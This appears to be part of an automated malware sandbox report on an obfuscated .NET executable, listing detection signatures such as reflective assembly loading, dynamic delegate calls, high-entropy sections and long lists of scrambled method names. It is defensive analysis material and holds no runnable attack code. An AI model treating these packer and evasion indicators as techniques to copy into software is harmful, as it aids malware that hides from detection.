Source:	Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: ogVinh0jhq.exe, wpPecfWpqrBtg6PNoTR.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: ogVinh0jhq.exe, JwOu6IFnFx821PsQRhI.cs	.Net Code: GL4ceh1tpP System.AppDomain.Load(byte[])
Source: ogVinh0jhq.exe, JwOu6IFnFx821PsQRhI.cs	.Net Code: GL4ceh1tpP System.Reflection.Assembly.Load(byte[])
Source: ogVinh0jhq.exe, JwOu6IFnFx821PsQRhI.cs	.Net Code: GL4ceh1tpP

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B76D2A5 pushad ; iretd	4_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B88ADF8 push E959ACA2h; ret	4_2_00007FFD9B88AE29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B88AE2A push E959ACA2h; ret	4_2_00007FFD9B88AE29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B88B99A push E85700D7h; ret	4_2_00007FFD9B88BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B952316 push 8B485F94h; iretd	4_2_00007FFD9B95231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B77D2A5 pushad ; iretd	5_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B962316 push 8B485F93h; iretd	5_2_00007FFD9B96231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B961331 pushad ; ret	5_2_00007FFD9B961351
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD9B77D2A5 pushad ; iretd	17_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD9B890C7D push eax; retf	17_2_00007FFD9B890CCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFD9B962316 push 8B485F93h; iretd	17_2_00007FFD9B96231B
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Code function: 24_2_00007FFD9B8700BD pushad ; iretd	24_2_00007FFD9B8700C1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Code function: 31_2_00007FFD9B8700BD pushad ; iretd	31_2_00007FFD9B8700C1

Source: ogVinh0jhq.exe	Static PE information: section name: .text entropy: 7.194999016081263
Source: RuntimeBroker.exe.0.dr	Static PE information: section name: .text entropy: 7.194999016081263

Source: ogVinh0jhq.exe, jCns1KcgyuTDnH2q9kn.cs	High entropy of concatenated method names: 'GFAnMoXUp0', 'tQ7nNHTlt0', 'fI2Wc64manWHsYvWB8r', 'J3mjf24Ytg5a8YSA4kh', 'BsQDrU4GmYJbgOFIsh4', 'yqVNB546wFfGGqtWN9K', 'oONb874pyXJ9xN3kwrm', 'dL0FUT4kEmsn854HWUI'
Source: ogVinh0jhq.exe, U5PdTjFlTtSXP8k9Z2j.cs	High entropy of concatenated method names: 'wi50jkIZVh', 'zWu07N4e1x', 'ksY0lNh7y4', 'nRl0kPqWsM', 'tFI0gr76cF', 'osxekaHrBc40D16bdNu', 'RebuYKHyUj8Ir67yRZB', 'vxyf4PClSK4JnysCBRr', 'qFvZcYCzZkiTXlORTHQ', 'hGwUP3HeHnAGH2e6VFZ'
Source: ogVinh0jhq.exe, PuyFUYyfcFbNpQLVdq9.cs	High entropy of concatenated method names: 'KSu12KRQl2R1coEoqBN', 'yIiNq4RncHRtZSNRQLB', 'FgjmGpRIRdoAJmbjSfb', 'd82XpIRVNabD68FyW4f', 'Ybe0XLRshbbU7nDGHv1', 'qEsflTR1AG45BP6cjse', 'ibYMlwR2VwIa40wokqO'
Source: ogVinh0jhq.exe, mlwQIIQHD4CZa9X5CfX.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'KFD19C1rSOgRvPP5Yhf', 'rdnVI91yheQcjpwc2pm', 'UDLGwr1erk9xPp8Cwga', 'pduRKi1Iu8Jc3Cbn56I', 'qxJ3Ei1V7IX7pHC99WP', 'OTA9871QkoLNsrwZb1L'
Source: ogVinh0jhq.exe, XbFbY6Q7bPv8VnIvutk.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'NCpmtr1AOpIKWkKgLNF', 'rsmQwt1bEUKHAAL4Zxm', 'Dyiv1a10Cpq5YT40Vsd', 'qXyQ7t1dIidJdODk62v', 'YeIyaq15bgENf2eRuAQ', 'FwERaH1WZwBXJkhapo2'
Source: ogVinh0jhq.exe, qfKrjJ0j9kF2loQ0MZq.cs	High entropy of concatenated method names: 'uJh2NZ6CIo', 'cj92BeYS9q', 'Jhu21OIdOV', 'fDd2LRbE1L', 'rTy24rt1Ic', 'A83xnU0LM1pdLVv5mcp', 'lLp7400N9qARfwCKpm9', 'wP2BdQ0w4roc5WukXxI', 'VdwM5p0ZuAp5mj0LtXs', 'UyFAm50BDwTRuB5X3ib'
Source: ogVinh0jhq.exe, xEqa8QFhy0CJ1P8i9Qw.cs	High entropy of concatenated method names: 'OWTWCr7avm', 'QpCbafmqSukGR9c7ksZ', 'z2RJqSmPaFsETNbMktU', 'IMpTGxmOBAQHMp7YrQf', 'YghJPrmTt6xWDbVcdtb', 'sPothgmaLOhpC7REjDw', 'L5IWZvhAtl', 'hHHWDsl6sd', 'P7QWxI7hRV', 'RXPWjyRUML'
Source: ogVinh0jhq.exe, TvCyJ348esCkqHEYdX.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'caxFPBINVxWC4GJvqJx', 'ekXJG7IBqO9eT5wrx1N', 'VZI37LIRYfXv2FsY48x', 'y4aDMIIi7XBTqpQXhKn', 'HOvB29ItbKckZpMuu1F', 'Ia35gdIMHnSV7i00guh'
Source: ogVinh0jhq.exe, ggfqftFeYD1NsTe2GmB.cs	High entropy of concatenated method names: 'Ks5ciI5nhD', 'dm4YGp8IU3fPW37OIP1', 'XS9F6m8V4JGo7Pp9eDc', 'e2ltYo8y3h6OgFJdSK9', 'dw6FtS8ekHOYCQuYRat', 'vSD1MV8Q2oIpcLAN6C8', 'T5D9WS8n7BXEfGBg8qS', 'Pg3ZoO8sl2kHNwA9j10', 'hP8pNj81npwN7Klji4x', 'cJfIQR823OReOg56KOn'
Source: ogVinh0jhq.exe, RStuPrQeoMy8kFBP0XW.cs	High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'dZ0VOysiirbbWMNApnM', 'OpXhHSst0o1UoomN2kl', 'HRAgELsMBCL860bXC2N', 'Wnedqfsueil1hO4sQDF', 'Wakv0WshjZRVxrpI20S', 'mrDfbasfQin6OXcrOD3'
Source: ogVinh0jhq.exe, BZwgIVc2kqOaWjEu9iJ.cs	High entropy of concatenated method names: '_223', 'DYq7H2k6SD0krIWMNX4', 'Il9TWVkmCRjMfq3QDvD', 'fGrcpRkYqPMHOjL41Tl', 'llBr4VkppQQPv8wvRCU', 'Wm8wbpkkdYvI3hC3YDb', 'tunNoakXGGN4ocpP2Oc', 'fZyT0dk41LVQmRpYofb', 'u5bvtBkERB7MqvULs4o', 'oX0pHCkACOcF8QJFG15'
Source: ogVinh0jhq.exe, tsosojarM1nMh8xRkV.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'LNv89dQ5X0Ytut9sT8u', 'Qd6GofQWnyNchODRn7H', 'AcyNEDQoMGDdCG3l0WD', 'WO3V49QKhSmdyNqQt0X', 'LsQnQGQ7jXLf0PCyVbK', 'cWTpZLQwCE9ewhgeGeh'
Source: ogVinh0jhq.exe, kawxgxN6voODD07TOQ.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'bfHTErTr1', 'TZr1AZeLaaHnxwI2ZGN', 'a1MA9reNFtUhk63kx8L', 'Sp096VeB34uBPQ7ukY3', 'luEV8teRbDRAGIlPp72', 'juftNpei5H8Zn4qoLFC'
Source: ogVinh0jhq.exe, qjpQ5VQwJlYF6JGDRIP.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'IBAGuF2N3H9w2dU14X5', 'Na7iwU2BygBboFqVhD1', 'skJaqa2RZISfbTKotRC', 'DHZ5He2iA5m3qB7dJ4r', 'rrKCUn2t0alrCdysXkJ', 'aQevIW2Mhb0NA5205cr'
Source: ogVinh0jhq.exe, epEuUqF4rLG9pWTyU0v.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'uZ8yBP3uV7', 'fQ3y16ypEu', 'KqryLLG9pW', 'NyUy40v7CN', 'CSuyfKIrO9', 'EcLPvr62Esrvie8vJnA', 'jmvqlS6jK7mfBpGp71Y', 'GnQpP26s9aXO62xg93v'
Source: ogVinh0jhq.exe, m3uNibsY0NVAicuh0D9.cs	High entropy of concatenated method names: 'NAHdlMWmaX', '_1kO', '_9v4', '_294', 'qfDdkX9U5A', 'euj', 'EiHdggZ04y', 'BTpdCAfS7j', 'o87', 'Ht3dX3bhyA'
Source: ogVinh0jhq.exe, nWpbbCyBYuMqkO5825E.cs	High entropy of concatenated method names: 'ssJCV8nuie', 'qdPApcBcH2mqZbLmCvt', 'KebP1CB3dAJdBy1UFuV', 'Vp95ouBgd0oFBsRZH8W', 'iGMvdNBD2UtJrOy1To3', 'OHqjNVBlWTkwJHnZopl', 'rfy6SCBzg3h4ekW43vd'
Source: ogVinh0jhq.exe, FaUMYdsNBsc8kTWZRUP.cs	High entropy of concatenated method names: 'B017q0hVCc2xU28oUsL', 'GDnwAUhQdqLlcmaf1Pq', 'iU33EZheBlwcxIxQCxb', 'TMmn4ghIFLxEiuJm1Ga', 'AD1IBWaq6x', 'WM4', '_499', 'IRNI1aA5ui', 'mZAILGNCUC', 'wYpI4oj1cK'
Source: ogVinh0jhq.exe, cI294qywU5BUaeG7bQP.cs	High entropy of concatenated method names: 'SGmg8gQXLp', 'aPKgSWeW70', 'uiWgKjXjsh', 'cgxi8PBL8oNB2WlA9Oe', 't7fhUCBwnTJ1IZMi3sj', 'RSmPsVBZoe7HU4Wgky6', 'm1LQh8BNAfvXdLGFOta', 'em7A8nBBPT1D2WnOL3X'
Source: ogVinh0jhq.exe, lmB3bH8MMWhclqheVq.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'ccJacnV6EWcH9PnTtmX', 'IkuSepVmtGlLbMf43qc', 'QrHAuJVYO2L4TCIoMkX', 'XoMw1VVpwIQAJk2K5d4', 'LGxOyfVkB5Aq7opnX1p', 'JSLAs8VXdG88KQAfYyJ'
Source: ogVinh0jhq.exe, nXdpjM0IFNmwUPcL2VK.cs	High entropy of concatenated method names: 'xDcpNfpBko', 'lkBpBq28iv', 'EiRp1Xp5bo', 'xXvpLNnkBm', 'WGAp4eVFsk', 'cB3DZddYSi2MxO5r4XB', 'GLCj28d6Wwq8wqQK2IC', 'qcnMrhdmWkW1IkE9aXt', 'bYNyJydpwUoTP65IG2N', 'MVLC7adk5ynRcLX1CU1'
Source: ogVinh0jhq.exe, K8BEtkyANdWPTrwCq1n.cs	High entropy of concatenated method names: 'hWlC0wZOHJ', 'DsjCyRjxkl', 'wAFCscuB5s', 'PNfCWIsgKS', 'JpqC9NSteN', 'J2gCni6M21', 'hSaCv95V7P', 'IsGCbip1pL', 'JCaCr7Gjv1', 'oW0C2jwo6S'
Source: ogVinh0jhq.exe, Vswx1HQ6ro9ibAt4ELa.cs	High entropy of concatenated method names: 'X53QSXruGM', 'XsXIQNjetoG1w94qkqN', 'MQsmqjjIaVfQYiPfq8l', 'qICkaZjr781u4flxVN0', 'H4QbOhjyYs4xeP08C3R', 'lPLykcjVTSjDSiiHrBk', 'gqj8LVjQYPIQ1a5RGYT', 'jN5An9jnZfBw9tx6flM', 'P08QtHARc1', 'NOefkRj2DAECRMfX5QG'
Source: ogVinh0jhq.exe, qEYB72FB0Q5kXeEY1Rj.cs	High entropy of concatenated method names: 'NHEydYB720', 'dBX1H3GDF8Ds5Mq41Th', 'tt6yFtGltZKaXwgQrW0', 'Xk5UQ0Ggfb7D6Ri5cYf', 'c9IDAJGcZhQdyYQwf7W', 'x5YgY6GzP0tjBjx6wXF', 'DGL2cV6rH4ZLRQGY5Rr', 'o1Ime86yaqNWvZClTAD', 'omELG36e7Rs5TbVDIeX', 'ffuU8y6I6WGHMmYef5W'
Source: ogVinh0jhq.exe, aFcF4GFwonAtAKwb4ai.cs	High entropy of concatenated method names: 'CpR0u8gpQm', 'eYg0htMu8k', 'JvN0zHKWkl', 'jVXyVeWoCK', 'phwyQtQPVW', 'RVoyFZVKcf', 'DsUycUHPUi', 'jDky0bYo6b', 'IBMyyaa5Pd', 'SZeZ0AH32UbS51Fd1sH'
Source: ogVinh0jhq.exe, xQ41iKQQugIE7O8OWRT.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'E3WsR2nYi4wtnbf6fHP', 'gJl2sbnpABQolOosdJ7', 'FIIW0nnkPLRAFGoP1Be', 'gFHsWGnX3GjdEyyCj5u', 'ETHw2Yn42qdo3EPTgsu', 'RZF2FcnEX2VHwQtDRgI'
Source: ogVinh0jhq.exe, GHYbbHQhj8G2OHbxaW8.cs	High entropy of concatenated method names: 'dTIFlvU9Ty', 'xlWFkQCTuD', 'cHXFg2rOrL', 'sAho9UvFDIbUqxdgrul', 'Pastwtv28EEDpmF6neG', 'WRCD3Kvji4t6aHw4BeO', 'xwmC8Yvvxto5645r8PM', 'sUARN0vSKM0hmwvWsS5', 'eLGhNrvUwRVdgKXTid4', 'xhx9vLv8CBENx4UqJT8'
Source: ogVinh0jhq.exe, DP40a1iZxlGVAsSNQY.cs	High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'xRDuOCQf2FgadTK4IBT', 'EqcrNfQJNhW6rRRN7HV', 'D9TXV1Q9y3fSe7vg2ly', 'dmiuEGQPjycFg8ZfiJS', 'Ki2ZFBQOwRrAodOMKWY', 'C7aqxaQqCiepAWN1QBw'
Source: ogVinh0jhq.exe, O9qfhuskOIdOVWDdRbE.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'ybWXgYgQGI', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: ogVinh0jhq.exe, I7LGsHWCKA0jEEcF41j.cs	High entropy of concatenated method names: 'fyNmgex019', 'MDMmC4lUsu', 'iKYmXNQSwR', 'vCLmIXfPo9', 'bEKmJd5qHi', 'ofCmwueYZl', 'qoomdHSJUu', 'YmEm6fCpcD', 'T6Omm6yuqi', 'HK6mMcJgdl'
Source: ogVinh0jhq.exe, TBDJpBQkxdQCT4Zjiuo.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'wFeY4O1LbKjDAJeHP4O', 'GpcErx1NuZotG8o1tB3', 'Gp98rX1BQHxgVVdj9aV', 'XK7jwM1R9XIRELrvHMN', 'mVDBTM1ivoMgsLlZBkq', 'K43sou1txycCOMRAadN'
Source: ogVinh0jhq.exe, N9JNBYQCvcdF6gb57d2.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'O1CwuO19IUrojxx0Ns0', 'TtFhm91PKgmThYSvkUZ', 'WDabgH1OvSuEfJe6Okx', 'gI93P31qkt5wyOKsjo9', 'g04iOs1TbEm8wyAuW38', 'RsGrJo1apA0VsFaqiot'
Source: ogVinh0jhq.exe, boRZjecv6VJihXa54yn.cs	High entropy of concatenated method names: 'oJi9NbQQwV', 'Qjg9BB2F5x', 'Hwg91VPD74', 'UcvpmVk884NhEh6IcDq', 'lM0EAKkSwie2eEI9NTb', 'xKbQYpkUTIgmgZbq3b7', 'aST2JMkC5yw3eKxlsk8', 'Ppn9Gwrt5V', 'QFv9qhKgjp', 'tBt9o5QRLI'
Source: ogVinh0jhq.exe, l038GWyMr09eP5vCp8A.cs	High entropy of concatenated method names: 'vXogRTt5eq', 'wCNgatcmXk', 'iUfgASbXEl', 'sXrgigVDZ1', 't21gENBtbD', 'HQgguUOMOE', 'iXJGFdBP65JIxB4RfIC', 'CAlmr2BJxE3ShSmJ3RE', 'Csub4MB9ijtZKZq2Me2', 'M2xfmNBOTMX0kU8MOgi'
Source: ogVinh0jhq.exe, KxFGmMcQsSfXTnQMPiS.cs	High entropy of concatenated method names: 'yPwWdfAkAO', 'TWHW665I2v', 'RfmWmeTOmY', 'qCKWM1jpFG', 'rw4sEhmzPiRA7QNqOgk', 'eLOj4NmDJiBrAkgH0H5', 'BMGN2SmljkPjVyg6nXI', 'CgmeeHYraNrAtubdq3n', 'um0BS3YyfXrkjc7mVpZ', 'QdTgaKYeqmB29eyHVMa'
Source: ogVinh0jhq.exe, AwPXWS0ZkqkUgLmies4.cs	High entropy of concatenated method names: '_7zt', 'm8E2DXT5Sl', 'aOD2xsXCcw', 'bTT2jRSYXE', 'osH27ckFc6', 'KVp2l9pG7D', 'u5t2kpZB06', 'MbOmmj045B6a1WBSCPs', 'vOZ0ca0EMKTWndoHOcO', 'vKCYwJ0kTZdD1uTk7Oe'
Source: ogVinh0jhq.exe, OwJbjuyn7so20jYlxHt.cs	High entropy of concatenated method names: 'Tg4gxWmtoa', 'VPNgjClwAU', 'Q4U8n5NxpoFqDAL8Pny', 'q92fc8N3duj7rrwrVAx', 'ng4bvbNgklKMFURYaVH', 'mdIlX5NcoYLVLiS25jg', 'p9P4cnNDYbinF0mo8wi', 'QXBkZkNlt5ILcksHtOP', 'eFthZ3Nzo5sWqt6LWoN', 'MofuUSBrE40Ra10ZIHg'
Source: ogVinh0jhq.exe, WFZYtJycfxsqDRpPNNc.cs	High entropy of concatenated method names: 'wZUA4Jw4Ki9v95GNBfQ', 'swW2OiwEN0Woq5idonY', 'Pib2mMwko1E3dmxWms2', 'w9gedlwXWRkmosaUQfG', 'Sw8xgKf3sk', 'oFSrrYw0vb5FjqAFJFc', 'uNRPn4wdHZblW76jkX1', 'Dgxt2bwAvnn0vuhvR4p', 'H7YLNWwbJH1q1mrVaDV', 'GFNtxJw5554Q9qQfbAs'
Source: ogVinh0jhq.exe, pyZBiOsFFXN0sX3KOsB.cs	High entropy of concatenated method names: 'vFRX9eEi2d', 'FBQXnElCqt', '_8r1', 'k84XvZWf69', 'aZiXbuWuxM', 'DjZXrkpi8w', 'ujJX281U1N', 'OCFLhZtHEDo8DIg3yFl', 'rX1logtG7mLWm18WUig', 'kJJE6Ht6hOFf4L6XklN'
Source: ogVinh0jhq.exe, J58FvnFUpkaF6sI1en4.cs	High entropy of concatenated method names: 'pZxs9cCqC8', 'crAsncqxUq', 'bcWafZ63vLwkdLMBXwe', 'XXfwTj6goqNkHJTnhZ5', 'wohit96aKU0XZPo9tt0', 'y5rnva6xBL6xdRiBMDq', 'Wqaso8Qy0C', 'JpgjPJmrKrd6YLWO2oi', 'wG9ZIvmyP69pKGYiBxO', 'ptPrZl6lS1X1vg4PxyM'
Source: ogVinh0jhq.exe, cm34Ycl8hvIiOvCADy.cs	High entropy of concatenated method names: 'juKg2qqOo', 'uToCMVgNo', 'CPAXsVW6K', 'AKbIAaq3k', 'cbfJKBThL', 'ycpwY2gv0', 'jQidjRqcA', 'hb6TEny1bLbgn2ZyXVd', 'rbcrd6y2RlLefouhJXS', 'afZ0oVyj19TteT7BqbM'
Source: ogVinh0jhq.exe, hC7V6uQBwIIQDGZDDWa.cs	High entropy of concatenated method names: 'Eh8QaxRkVt', 'a3kD5KjAWhW2gqnWq0G', 'GPjnh7jbY0GchYUhhiM', 'atadASj43BlgiJfsFnJ', 'G7ZLF2jErpPv38pUXve', 't0d6Ruj0v7YKiF4T5NZ', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: ogVinh0jhq.exe, KnfI42FZyqAmli2Crlp.cs	High entropy of concatenated method names: 'xgoczueeMh', 'joM0V36QE1', 'DE90QNirAw', 'UNo0FY4AIk', 'uOE0cZv5S0', 'ftb004fYbW', 'ayk0yRQFoq', 'WIi0s00usc', 'Sku0WXQY9G', 'HBH09yqQk7'
Source: ogVinh0jhq.exe, kjyWk4s84kOO3VHQ5Th.cs	High entropy of concatenated method names: 'PJ1', 'jo3', 'hMbdnbpCXa', 'gMpdvipb6L', 'YvwdbmpG6U', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: ogVinh0jhq.exe, f8F6KCsmEaBBoWeYVlc.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'HtKICEmyYZ', 'As1IXMVgZ8', 'KlNII94nmD', 'hpSIJmWI9A', 'phPIwV7eER', 'i4YIdROWwr', 'RXPh7CuB5xbnEmyiPmS'
Source: ogVinh0jhq.exe, MI5nhDQOigu6ATKH4b4.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'kfsaF3F7WEBfs1PibMh', 'qiCA1eFwXSqgtcBSPF9', 'UeKZnyFZ6VYsXQR9DIa', 'OsKDbQFL0ih1kHfFg7L', 'BlFobnFN1JyZHMi4U3Q', 'y2HPjpFBoNBIWxCY1LR'
Source: ogVinh0jhq.exe, lNp9RRciMOND0F4LJ3y.cs	High entropy of concatenated method names: 'FyLHNeABLGmup58dovv', 'eVe4SZARShO4mKASrFM', 'ygFfQaAL78iioBiDZot', 'OT2AKWANfmegrKV1DfJ', 'IWF', 'j72', 'laavoXgjfK', 'LJcvHUYej4', 'j4z', 'pPjvZAmETw'
Source: ogVinh0jhq.exe, OiKjRScelLuhQaes7wt.cs	High entropy of concatenated method names: 'dD49TbNCx5', 'zxt98VBr1G', 'YXE9SLAJS6', 'HBR9KIyWWZ', 'igVXKBkZbIm6Jy4iycm', 'c9a8tSkLrwfM1HMbVRd', 'Wa7fL9kNATxiJBuI8E8', 'CYDu0Dk7cJWX09B4V5K', 'TvjApOkwdnnxAHX6UAZ', 'BY4LWpkBM2Nx3JVT279'
Source: ogVinh0jhq.exe, NXlvUWcKtJQapuqPtiU.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'ITpwckKEtc', 'PiOv08dQlL', 'V3uw9jewTj', 'zjNJPbEUTlH39B9Vu48', 'giEBphE8YA5t4vyx2Td', 'D3qJy3EC43GTKi2KiNy', 'Cm3a7KEHAyvcXMFk0Pa', 'yj54jJEGCWuJFfFkJSY'
Source: ogVinh0jhq.exe, XwBffcPOHTOeLdMl5b.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'xjIEgeQnAkpyhwKfMNR', 'qddZblQsFElM4pdvdMV', 'QHU3J2Q1mFn6oWvKDM6', 'yKf0K4Q2qOnZox7CpwE', 'tfXCZBQjZyiwer2ksLS', 'Gltqe5QFEs6g10JhmG0'
Source: ogVinh0jhq.exe, XuoF8M5jf78rffyepp.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'hsDoTsVFqW9JKNb6qO6', 'NfP8L2Vv8Y7VO0WyEkl', 'dhs7RjVSfbu2vOSW3DH', 'BnhIrDVUfEWJOlkKsoi', 'YKThckV8Liek523IRwM', 'gU6xvBVCPa0UffbOfd9'
Source: ogVinh0jhq.exe, CqIbs90Ye0TSmsR2aaX.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'JWIeGypflx', 'dQ6eqv1U0I', 'r8j', 'LS1', '_55S'
Source: ogVinh0jhq.exe, rIDylgQIgpiPQo0ABhi.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'sQW91w1lfoPJTcfh4F0', 'ocLbcy1zf9xOJXokPH9', 'biW6wK2rUQgBUCnyfRg', 'H5L9Pb2ykk0kGc541hM', 'Qq9yP62etPW6gAskTSD', 're9WSY2IAk6JtZtG2Ia'
Source: ogVinh0jhq.exe, F6GpxcUbGD2bEbW8Ox.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'LrSypwIgXH5oAoIlNsE', 'UdrtYMIcoGKuYGrnYxQ', 'NBw4mOIDSjgI7jm7EYb', 'uFcu1vIlJNVxBWp8r4g', 'sGxFTHIzvf24tro3RHl', 'JHDUg0Vrg4f7cEuY1Uu'
Source: ogVinh0jhq.exe, FgFRgPsVC58hSPIaWZ5.cs	High entropy of concatenated method names: 'hJPCS90tUw', 'HW5CKnWYhv', 'IyBCtsfRIF', 'xihCPGaLT2', 'pC9CYZwk1P', 'QcDCOTfbrN', '_838', 'vVb', 'g24', '_9oL'
Source: ogVinh0jhq.exe, aMlFFLcHlBCLxvd9EFm.cs	High entropy of concatenated method names: 'Rgc9RLQIiy', 'aw39a0VjsF', 'mKQ9ACBtnW', 'c019iKExtg', 'WX89EUW1bH', 'l91MspXn8mt2K0qnIUW', 'urb18QXsoXNCQ4Glg2P', 'uh8B2DXVBB7eENAsZsI', 'OVOcZMXQot7ajVIQuly', 'RpbIZUX1F3aonr9IUFY'
Source: ogVinh0jhq.exe, ChsluoQ3OJ4QJWNoA7I.cs	High entropy of concatenated method names: 'Q2sFQH5BAu', 'wyyFFQj79N', 'uiVFcg6npq', 'roDLh5jTNv7GgYktSPe', 'T0em9WjaPICM5r7GAi8', 'jYvOScjO2copdMqg1GF', 'qdjcQBjqJhc5YQTX1k3', 'EIuEdqjxUbYgAd5pTq5', 'Iv9XdTj3ixVE0pWHC5W', 'bgoESbjgMj5yAsMceoR'
Source: ogVinh0jhq.exe, TAUATXQ46mo401XrjOg.cs	High entropy of concatenated method names: 'vGVQuAsSNQ', 'ciq6sHjBLiLVWcT9fRl', 'ROIDqEjR3aOj0g5seZl', 'XftteqjLyogalROjkpN', 'jJVyl7jNKQJFmosdfR7', 'tB1hw5ji8YWMF5g9fDx', '_3Xh', 'YZ8', '_123', 'G9C'
Source: ogVinh0jhq.exe, A9TZxK0u4PUl713tHAw.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: ogVinh0jhq.exe, wpPecfWpqrBtg6PNoTR.cs	High entropy of concatenated method names: 'gGGUJdJ0WIFwaDKycyr', 'p2t4BVJd7IxyTmaQojL', 'vvIGbMJAvACa8GAw3sx', 'CnXqWbJba84WyD4nGXH', 'tvUmewTynP', 'nODrqaJo7F4le0oYooC', 'Vbrjh4JKVHfu9VF0Vno', 'EcMV51J70AoT9PP1BVT', 'gD0DXHJwMs6JETVKVFv', 'p3PT8SJZx0biLcDr4SR'
Source: ogVinh0jhq.exe, toyKJEWFPONjvP3i0S.cs	High entropy of concatenated method names: 'eKJpEFPON', 'tu6NqfwAeZTM5Hee5u', 'T4VWR1KY50DnPPGYn4', 'G9LkGj7GnepovIiMTp', 'Ttv0XvZLbMe3ToqxwU', 'r6JEkJLjdA6EKugnHI', 'k0HFVq1uM', 'Tu5cC6vKI', 'hIq0CUja1', 'qCuy8j8Gx'
Source: ogVinh0jhq.exe, OZRcV5c5wkLgPTgaCUG.cs	High entropy of concatenated method names: 'sg9', 'kiMwif546l', 'mlfnuRHfN1', 'luywtPPpuP', 'CJ7o7L4Pyt45ZdiC0DQ', 'gL4e384Oo2qEPxcapZe', 'AWKeQ34qimALO3tLn2X', 'P3ql5q4JmXDDF7AFDDK', 'fAMtPC49quuDB5MPsJm', 'DYxwiC4T7hTswShCbFK'
Source: ogVinh0jhq.exe, s4L8OWssh68LSm3sNNI.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: ogVinh0jhq.exe, JwOu6IFnFx821PsQRhI.cs	High entropy of concatenated method names: 'Pq2cMXnOmv', 'SHNcNIERb7', 'h6hcBsluoO', 'A4Qc1JWNoA', 'uIlcLR0NeV', 'BMpc4LpZn4', 'XmZcfsvWJc', 'NpQkBeUABAHmVBhcaBa', 'qiF1riU4GECn1UyZuYc', 'umFRgKUE7wcC6alrMua'
Source: ogVinh0jhq.exe, PfGLsGyEpLLc0LeoCwp.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'tAuCkXS3nj', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: ogVinh0jhq.exe, CTHW9qKoaYKEt6ssx4.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'gb2tcfVhXguH5MreliF', 'coBcDCVf43PBC7146ZU', 'RW4EsrVJBuBQN1RWrEn', 'LvWCpxV9UhuIDKbfxeo', 'wHqaGdVPRfZ7bQZ0J08', 'dGtMZRVOKF2p5cVXypd'
Source: ogVinh0jhq.exe, uPJeOncPvs2GxSxmmd9.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'erUwOYuPiH', '_168', 'u0YVOqEb6nA6CW9ULCr', 'V2uoD1E0XoeFM27xtYH', 'OiO1M3EdvK06xx3clNE', 'Vi7IAjE5pFyvheHjHr9', 'ADh4iLEW4h2A1Yh65QQ'
